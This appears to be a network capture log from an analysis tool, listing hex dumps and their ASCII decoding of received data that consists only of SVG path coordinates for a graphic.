                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1625INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1641INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                    Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1693INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                    Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1721INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                    Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1737INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                    Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1753INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                    Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1769INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                    Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1785INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                    Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1801INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                    Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1817INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                    Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1833INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1849INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                    Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1865INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                    Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1881INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                    Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1897INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                    Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1913INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                    Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1929INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                    Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
